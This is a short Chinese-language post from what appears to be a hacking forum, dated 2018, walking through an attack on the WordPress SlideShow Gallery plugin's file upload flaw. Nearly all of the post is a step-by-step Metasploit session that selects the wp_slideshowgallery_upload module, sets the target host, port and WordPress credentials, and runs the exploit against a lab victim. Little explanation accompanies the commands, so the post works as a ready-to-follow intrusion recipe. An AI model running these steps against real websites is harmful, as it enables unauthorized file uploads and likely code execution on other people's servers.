利用WordPress插件SlideShow Gallery的绕过身份验证的文件上传漏洞进行测试

zevseo
4420zevseo大版主
2018-09-12 00:51:32
4420 2018-09-12 00:51:32
WordPress SlideShow Gallery插件包含经过身份验证的文件上传漏洞。攻击者可以将任意文件上传到上传文件夹。由于插件使用自己的文件上传机制而不是WordPress API,因此可以上传任何文件类型。 利用目标
WordPress的
需求
攻击者:kali Linux
受害者PC:WordPress
打开Kali终端类型  msfconsole

现在输入  exploit use / unix / webapp / wp_slideshowgallery_upload
msf exploit  (wp_slideshowgallery_upload)> set targeturi /
msf exploitwp_slideshowgallery_upload)> set rhost 192.168.0.10 4  (远程主机的IP)
msf exploitwp_slideshowgallery_upload)> set rport 80
msf exploitwp_slideshowgallery_upload)> 设置wp_user用户
msf exploitwp_slideshowgallery_upload)> 设置wp_password bitnami
msf exploitwp_slideshowgallery_upload)> exploit        

本文标题:利用WordPress插件SlideShow Gallery的绕过身份验证的文件上传漏洞进行测试
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2324.html
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan